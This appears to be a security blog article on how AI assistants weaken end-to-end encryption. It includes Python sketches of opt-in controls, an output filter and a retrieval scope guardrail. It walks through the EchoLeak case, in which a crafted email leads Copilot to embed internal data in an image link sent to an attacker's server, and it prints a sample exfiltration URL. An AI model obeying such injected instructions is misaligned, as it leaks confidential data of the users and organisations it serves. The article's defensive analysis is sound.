Where is the endpoint?
A recent paper, “How to Think About End-to-End Encryption and AI,” raises important questions and suggests that incorporating AI into messaging forces us either to redefine the “endpoint” or to extend the boundaries of the encryption process.
If the AI runs entirely on your device, it could, in theory, still be part of the trusted endpoint. But this is not always the case. More capable models, such as those used for complex tasks, rely on the cloud. When your message is sent to an external server for AI processing – even temporarily – a new, unintended party is reading your content.
Even when the AI is hosted in secure, isolated environments, the classic E2EE model is compromised. The platform may not store your message or “read” it in a traditional sense, but the content has now passed through a system that is not the intended recipient. If E2EE is meant to give users confidence that their data stays private, the introduction of AI assistants undermines that trust.
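To make the boundary concrete, here is a minimal sketch in Python. It uses the Fernet cipher as a stand-in for a real messaging protocol, and the summarize_in_cloud() call is an assumption invented for this example, not any vendor’s API. The relay only ever handles ciphertext; the moment decrypted content is handed to a cloud assistant, plaintext exists somewhere other than the two endpoints.

```python
# Minimal sketch (not a real messenger): where does plaintext exist?
from cryptography.fernet import Fernet

shared_key = Fernet.generate_key()       # held only by sender and recipient
sender = Fernet(shared_key)
recipient = Fernet(shared_key)

ciphertext = sender.encrypt(b"Q3 launch moved to October")  # all the relay server ever sees

plaintext = recipient.decrypt(ciphertext)                    # plaintext exists only at the endpoints

def summarize_in_cloud(text: bytes) -> str:
    """Hypothetical cloud AI call: this is where plaintext leaves the endpoints."""
    # requests.post("https://ai.example.com/summarize", data=text)  # the boundary is crossed here
    return "summary..."

summary = summarize_in_cloud(plaintext)  # a party that is neither sender nor recipient now sees the content
```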
Redefining privacy expectations
To be clear, this does not mean that AI and privacy are mutually exclusive. When implemented thoughtfully, AI features can make life easier, while also keeping data secure. But the key word is thoughtfully.
Consider the following when assessing how AI and private communications can coexist:
- Transparency: Users should know exactly what data is being processed, where it’s being processed, and whether the assistant is hosted locally or in the cloud.
- True opt-in control: AI features should be off by default, especially in encrypted messaging apps. If users want them, they should actively opt in, with a clear explanation of what that means for their privacy (a simple sketch of such a gate follows this list).
- Updated definitions of E2EE: If platforms are extending the definition of an “endpoint” to include secure cloud environments or AI services, they should say so.
- Collective privacy: If one participant in a group chat is using an AI assistant, are they sharing everyone’s messages with that tool?
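As a rough illustration of the opt-in principle, here is a small Python sketch. The AISettings fields and the maybe_send_to_assistant() gate are assumptions made up for this example, not any vendor’s actual settings model: AI features ship disabled, the processing location is surfaced to the user, and decrypted content is only handed over after an explicit opt-in.

```python
# Sketch of an opt-in gate: nothing is processed unless the user actively enabled it.
from dataclasses import dataclass

@dataclass
class AISettings:
    enabled: bool = False                   # off by default
    processing_location: str = "on-device"  # or "cloud" -- surfaced to the user
    consent_recorded: bool = False          # set only after the user actively opts in

def maybe_send_to_assistant(message: str, settings: AISettings) -> str | None:
    """Forward a decrypted message to the assistant only if the user opted in."""
    if not (settings.enabled and settings.consent_recorded):
        return None  # the message never leaves the E2EE endpoint
    # ...hand off to a local model or, with clear disclosure, a cloud service...
    return f"[assistant ran {settings.processing_location}] {message[:40]}"

# Default behaviour: the assistant sees nothing.
print(maybe_send_to_assistant("confidential roadmap", AISettings()))  # -> None
```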
It’s not just a privacy issue; it’s a business risk
EchoLeak is a red flag for business leaders. It demonstrated that AI assistants can silently exfiltrate sensitive company data. A single email, crafted to bypass prompt injection protections, could cause an AI assistant like Copilot to retrieve internal organizational data and embed it in a disguised image link. From there, the victim’s browser would unknowingly send the data to an attacker-controlled server: no malware, no endpoint compromise, just abuse of how the AI interprets and responds to context.
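To see why a disguised image link is enough, consider the simplified Python sketch below. It is not EchoLeak’s actual payload or Microsoft’s fix; the allow-list and hostnames are made up. The point is the pattern: when a client auto-renders an image whose URL carries data in its query string, the fetch itself is the exfiltration, which is why one common mitigation is to strip data-bearing links to untrusted hosts from model output before rendering.

```python
# Illustration of the exfiltration pattern and one possible output filter.
import re
from urllib.parse import urlparse, parse_qs

ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.com"}   # hypothetical allow-list

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")   # markdown image syntax: ![alt](url)

def strip_suspicious_images(markdown: str) -> str:
    """Remove markdown images that point off the allow-list or carry query data."""
    def check(match: re.Match) -> str:
        url = urlparse(match.group(1))
        if url.netloc not in ALLOWED_IMAGE_HOSTS or parse_qs(url.query):
            return "[image removed]"
        return match.group(0)
    return MD_IMAGE.sub(check, markdown)

# An attacker-shaped reply: the "image" URL quietly carries internal data.
reply = "Here is the report ![chart](https://evil.example.net/p.png?d=Q3-acquisition-target)"
print(strip_suspicious_images(reply))   # -> Here is the report [image removed]
```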
Even though Microsoft addressed the issue before public disclosure, the vulnerability received a critical CVSS score of 9.3, underscoring how severe the implications are for organizations working to protect their data. As AI assistants are integrated more deeply into workflows that handle proprietary information, such as upcoming company plans or client data, the possibility of a breach that involves no human error or user interaction will only grow.
There is also the question of collective exposure. If one person in a group chat enables an AI assistant like Copilot, could they inadvertently share everyone’s messages with that tool? Imagine a conversation about a confidential product roadmap, now processed by a third-party cloud model. Are those messages still protected? Or has sensitive data crossed a line no one realized existed?
A new consideration for defenders
Defenders have long focused on human error, but AI assistants handling decrypted content are shifting the threat model. When large language models (LLMs) process sensitive information, they become part of the attack surface. The EchoLeak vulnerability exposed a new category of risk, LLM scope violations, in which AI systems unintentionally leak internal data without user intent or awareness. These attacks don’t rely on malware or phishing; they exploit how AI interprets prompts and retrieves context.
Defenders need to start treating AI tools as active parts of the security stack. That includes monitoring where AI processing happens, ensuring guardrails are in place for both inputs and outputs, and evaluating how third-party AI features interact with sensitive workflows. If AI assistants can access shared documents or messages, especially in group settings, organizations need to know whether one user’s decision to enable AI puts others at risk. These systems must be audited, restricted where necessary, and included in broader threat modeling efforts moving forward.
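As one example of what that could look like in practice, here is a minimal Python sketch. The Document model, the ownership rule, and the logging are assumptions for illustration only, not a description of any real product: retrieved context is filtered to the requesting user’s own data before it ever reaches the model, and every inclusion or exclusion is logged so the assistant’s behavior can be audited later.

```python
# Sketch of a scope guardrail: filter and audit what the model is allowed to see.
import logging
from dataclasses import dataclass

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("ai-guardrail")

@dataclass
class Document:
    owner: str
    source: str      # e.g. "email", "group-chat", "sharepoint"
    text: str

def build_context(user: str, retrieved: list[Document]) -> list[Document]:
    """Drop anything the requesting user does not own; log what the model will see."""
    allowed = [d for d in retrieved if d.owner == user]
    for d in retrieved:
        verdict = "included" if d in allowed else "blocked (scope violation risk)"
        log.info("user=%s source=%s -> %s", user, d.source, verdict)
    return allowed

docs = [
    Document("alice", "group-chat", "Draft roadmap for the Q4 launch"),
    Document("bob", "email", "External message with embedded instructions"),
]
context = build_context("alice", docs)   # only alice's own content reaches the model
```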
The path forward
The EchoLeak vulnerability made it clear that AI assistants can be manipulated to leak sensitive data. It also revealed a broader category of risk: LLM scope violations, where large language models unintentionally expose internal information based on how they interpret prompts and retrieve context.
End-to-end encryption was built to keep messages private. But that privacy starts to break down when decrypted content is passed to an AI assistant. Even if processed securely, the message is no longer limited to the original sender and recipient.
This is not an argument against AI; when done well, these tools improve usability, accessibility, and productivity. But it is an argument for doing it right.
That means giving users true opt-in control, offering clear visibility into when and how AI is used, and reexamining what secure communications should mean in an era where apps don't just deliver messages but also interpret them.
The way we define privacy has always evolved with the technology we use. As AI becomes part of how we communicate, we have a responsibility to ensure it doesn't also become the quiet third party in conversations we thought were just between us.